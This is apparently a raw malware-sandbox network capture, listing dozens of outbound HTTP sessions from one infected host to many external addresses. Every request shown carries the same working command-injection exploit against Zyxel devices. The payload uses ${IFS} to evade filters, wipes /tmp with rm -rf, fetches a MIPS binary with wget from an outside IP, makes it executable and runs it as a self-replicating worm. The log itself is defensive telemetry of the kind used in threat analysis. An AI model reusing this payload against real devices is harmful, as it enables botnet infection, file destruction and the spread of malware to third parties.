                        Mar 12, 2024 08:50:34.125662088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1858192.168.2.1451754192.1.145.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125700951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1859192.168.2.144925244.213.113.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125751019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1860192.168.2.1436336171.98.190.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125787020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1861192.168.2.145828427.222.226.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125817060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1862192.168.2.1436934222.246.223.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125874996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1863192.168.2.1433448128.120.253.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125924110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1864192.168.2.1451922115.209.22.36443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125953913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1865192.168.2.145495278.49.68.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.125979900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1866192.168.2.1437564191.239.159.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126049995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1867192.168.2.143555060.147.69.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126095057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1868192.168.2.1452348115.90.25.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126141071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1869192.168.2.1458458173.222.157.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126188993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1870192.168.2.143907058.86.111.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126244068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1871192.168.2.1438186179.15.66.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126291990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1872192.168.2.1444174139.234.92.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126317024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1873192.168.2.1442746175.172.42.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126374960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1874192.168.2.1434808173.35.34.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126394987 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1875192.168.2.1450652132.102.136.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126426935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1876192.168.2.1433314196.166.20.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126465082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1877192.168.2.1447932178.128.221.130443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126491070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1878192.168.2.1455138110.193.104.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126545906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1879192.168.2.1459360210.3.101.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126585007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1880192.168.2.1439348133.0.204.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126640081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1881192.168.2.146070217.208.178.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126692057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1882192.168.2.1452550168.165.130.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126718998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1883192.168.2.1458730180.55.201.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126791954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1884192.168.2.145702434.44.107.29443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126818895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1885192.168.2.1443880172.12.192.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126867056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1886192.168.2.1450210159.93.239.72443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126897097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1887192.168.2.1449412132.48.255.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126944065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1888192.168.2.1443736161.57.22.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.126961946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1889192.168.2.145503681.125.4.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127012014 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1890192.168.2.1436316188.87.66.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127059937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1891192.168.2.1458210216.25.126.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127104044 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1892192.168.2.1447488139.237.93.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127151012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1893192.168.2.143550677.31.164.150443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127199888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1894192.168.2.145370635.183.30.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127257109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1895192.168.2.1439730190.60.236.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127290010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1896192.168.2.1437956111.138.122.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127327919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1897192.168.2.143723683.125.102.120443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127374887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1898192.168.2.1444528124.139.179.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127404928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1899192.168.2.1440166185.172.55.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127449036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1900192.168.2.1440642218.132.234.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127474070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1901192.168.2.1442094180.233.249.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127557039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1902192.168.2.1442862209.16.130.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127593994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1903192.168.2.145549098.162.113.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127640963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1904192.168.2.1437398193.184.113.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127691031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1905192.168.2.1440606206.36.90.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127722979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1906192.168.2.1453048147.202.164.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127756119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1907192.168.2.144586694.11.227.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.127791882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1908192.168.2.1440274151.15.244.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.131047964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1909192.168.2.143912690.158.235.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.131119013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1910192.168.2.1455098136.188.179.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132482052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1911192.168.2.144900842.146.28.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132514000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1912192.168.2.143458638.2.23.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132577896 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1913192.168.2.1460582183.38.239.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132632017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1914192.168.2.1447016182.7.97.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132680893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1915192.168.2.1444268116.11.98.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132734060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1916192.168.2.143598899.111.250.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132787943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1917192.168.2.145119073.68.84.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132841110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1918192.168.2.145783899.247.149.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132890940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1919192.168.2.143728491.137.14.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132908106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1920192.168.2.1455866156.111.114.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132944107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1921192.168.2.145802641.161.211.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.132997990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1922192.168.2.143357887.224.72.195443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133040905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1923192.168.2.143564212.68.214.31443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133093119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1924192.168.2.144717665.67.156.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133132935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1925192.168.2.1435008202.123.65.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133166075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1926192.168.2.143762296.127.35.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:34.133209944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
